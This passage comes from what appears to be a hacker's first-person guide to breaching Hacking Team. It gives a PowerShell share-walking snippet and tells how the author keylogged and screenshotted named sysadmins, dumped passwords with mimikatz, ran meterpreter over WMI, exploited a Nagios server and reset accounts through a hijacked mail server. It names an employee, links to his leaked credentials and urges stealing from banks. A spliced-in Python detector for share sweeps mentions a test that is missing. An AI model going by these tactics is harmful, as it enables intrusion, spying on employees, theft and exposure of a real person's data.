    select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
    select fullname | out-file -append files.txt}

Later, you can read the list at your own pace and choose which files you want to download.

2) Reading emails

As we have seen before, you can download emails with powershell, and they have lots of useful information.

3) Reading sharepoint

Another place where companies keep important information. You can download it with powershell [10].

4) Active Directory [11]

It has lots of useful information about users and computers. Without being domain admin you can already find lots of information with powerview and other tools [12]. After gaining domain admin access you should export all the data from AD with csvde or another tool.

5) Spying on the employees

One of my favourite pastimes is hunting sysadmins. Spying on Christian Pozzi (sysadmin of Hacking Team) I gained access to the Nagios server, which gave me access to the sviluppo network (the development network with the RCS source code). With a simple combo of Get-Keystrokes and Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang [14], and GPO, you can spy on any employee or even the whole domain.

[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
[2] http://www.harmj0y.net/blog/tag/powerview/
[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
[6] http://www.slideshare.net/harmj0y/i-have-the-powerview
[7] https://adsecurity.org/?p=2535
[8] https://www.youtube.com/watch?v=rpwrKhgMd7E
[9] https://github.com/mubix/netview
[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
[11] https://adsecurity.org/?page_id=41
[12] http://www.darkoperator.com/?tag=Active+Directory
[13] https://github.com/PowerShellMafia/PowerSploit
[14] https://github.com/samratashok/nishang


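The share walk in technique 1 above has a very recognisable shape from the server side: one account opens IPC$ on every host to list its shares, then opens share after share across the whole network in minutes. The following is an added example for this page, not code from the guide or from Powerview: it reads Security Event ID 5140 (network share accessed) records as dicts with the fields Windows logs, and reports accounts that reach a threshold of distinct servers inside a sliding time window. The sample events, host names and the 600-second / 5-host thresholds are constructed assumptions to be tuned per network.

```python
from collections import defaultdict, deque

# Added example for this guide, not the author's or Powerview's code. Input
# records use the field names of Security Event ID 5140 (network share
# accessed); every sample value below is constructed.


def find_share_sweeps(events, window=600, min_hosts=5):
    """Return {user: (first_time, alert_time, distinct_hosts)} for accounts
    whose share accesses reach `min_hosts` distinct servers within `window`
    seconds. A domain-wide share walk opens IPC$ and then every share on
    every host in quick succession, a pattern that neither an interactive
    user nor a backup job (many events, few hosts) normally produces.
    Both thresholds are assumptions to tune per network."""
    recent = defaultdict(deque)  # user -> deque of (time, host) still inside the window
    sweeps = {}
    for e in sorted(events, key=lambda x: x["Time"]):
        if e["EventID"] != 5140:
            continue
        user, now = e["SubjectUserName"], e["Time"]
        q = recent[user]
        q.append((now, e["Computer"]))
        while now - q[0][0] > window:   # drop accesses that fell out of the window
            q.popleft()
        hosts = {h for _, h in q}
        if len(hosts) >= min_hosts and user not in sweeps:
            sweeps[user] = (q[0][0], now, len(hosts))   # report once per account
    return sweeps


def _access(t, user, host, share):
    """Build one constructed 5140 record (ShareName as Windows writes it)."""
    return {"Time": t, "EventID": 5140, "Computer": host,
            "SubjectUserName": user, "ShareName": f"\\\\*\\{share}"}


SAMPLE_SHARE_EVENTS = (
    # "alice" walks twelve file servers in three minutes: IPC$ for the share
    # list of each host, then one share on it a few seconds later
    [_access(1000 + 15 * i, "alice", f"SRV{i:02d}", "IPC$") for i in range(12)]
    + [_access(1007 + 15 * i, "alice", f"SRV{i:02d}", "Public") for i in range(12)]
    # a backup service hitting the same two servers every 30 s: many events, two hosts
    + [_access(t, "backup-svc", "SRV01" if (t // 30) % 2 else "SRV02", "C$")
       for t in range(1000, 4000, 30)]
    # "bob" opens a share on six different servers, but spread over three hours
    + [_access(1000 + 1800 * i, "bob", f"SRV{i:02d}", "Public") for i in range(6)]
)

if __name__ == "__main__":
    for user, (start, when, n) in find_share_sweeps(SAMPLE_SHARE_EVENTS).items():
        print(f"{user}: {n} distinct servers between t={start} and t={when}")
```

5140 is only written when the "Audit File Share" subcategory is enabled, and on a busy file server it is noisy, so in practice this runs against the events forwarded to a central collector rather than on each host; widening the window catches slower walks at the cost of more false positives, as the second test below shows.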
--[ 14 - Hunting Sysadmins ]----------------------------------------------------

Reading the documentation of their infrastructure [1], I realised I still lacked access to something important: the "Rete Sviluppo", an isolated network holding the whole RCS source code. A company's sysadmins always have access to everything. I looked in the computers of Mauro Romeo and Christian Pozzi to see how they handled the sviluppo network, and to see if there were other interesting systems I should investigate. It was simple to access their computers, since they were part of the windows domain in which I already had admin access. Mauro Romeo's computer didn't have any open ports, so I opened WMI's port [2] to run meterpreter [3]. Apart from logging keystrokes and screenshots with Get-Keystrokes and Get-TimedScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1 [4], and searched for files [5]. Noticing that Pozzi had a Truecrypt volume, I waited until he mounted it to copy the files. Many have laughed about the weak passwords of Christian Pozzi (and about Christian Pozzi in general; he makes good comedy material [6][7][8][9]). I included them in the leak as a distraction and for you to laugh at him. The truth is that mimikatz and the keyloggers see every password equally.

[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
[2] http://www.hammer-software.com/wmigphowto.shtml
[3] https://www.trustedsec.com/june-2015/no_psexec_needed/
[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
[5] http://pwnwiki.io/#!presence/windows/find_files.md
[6] http://archive.is/TbaPy
[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/


--[ 15 - The bridge ]-----------------------------------------------------------

Inside the volume encrypted by Christian Pozzi, there was a text file with many passwords [1]. One of them was for a Fully Automated Nagios server that had access to the sviluppo network in order to monitor it. I had found the bridge. I only had the password for the web interface, but there was a public exploit [2] to execute code and get a shell (the exploit doesn't need authentication, but it does need a logged-in user, which is what I used the password from the text file for).

[1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
[2] http://seclists.org/fulldisclosure/2014/Oct/78


--[ 16 - Reusing and resetting passwords ]--------------------------------------

Reading the emails, I had seen Daniele Milan granting access to git repositories. I already had his windows password thanks to mimikatz. I tried it on the git server and it worked. I tried sudo and it worked. For the gitlab server and his twitter account, I used the "forgot my password" function and the access I had to the email server to reset the password.

--[ 17 - Done ]-----------------------------------------------------------

That's it. It's this easy to take down a company and stop its abuses against human rights. This is the beauty and asymmetry of hacking: with just a hundred hours of work, a single person can undo years of work of a multimillion dollar company. Hacking gives us, the poor, the possibility to fight and win.

Hacking tutorials usually end with a warning: this information is only for educational purposes, be an ethical hacker, don't attack computers without permission, blah blah blah. I'm going to say the same, but with a more rebellious concept of ethical hacking. It would be ethical hacking to leak documents, steal money from banks and protect the computers of the common people. Shamelessly, most people who call themselves ethical hackers work only to protect those that pay their consulting fee, who are usually the same ones that most deserve to get hacked.

At Hacking Team they see themselves as part of a tradition of inspiring Italian design [1]. I see them, Vincenzetti, his company, and his friends in the police, carabinieri and government, as part of a long tradition of Italian fascism. I want to dedicate this guide to the victims of the raid on the Armando Diaz school, and to all those who have shed their blood at the hands of Italian fascists.

[1] https://twitter.com/coracurrier/status/618104723263090688


--[ 18 - Contact ]-------------------------------------------------------------

To send me spearphishing attempts, death threats written in Italian [1][2], and to gift me 0days or access inside banks, corporations, governments, etc.

[1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
[2] https://twitter.com/CthulhuSec/status/619459002854977537

Only encrypted emails please:
https://securityinabox.org/es/thunderbird_usarenigmail
-----BEGIN PGP PUBLIC KEY BLOCK-----

mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
+fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
=E5+y
-----END PGP PUBLIC KEY BLOCK-----



If not you, who? If not now, when?
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)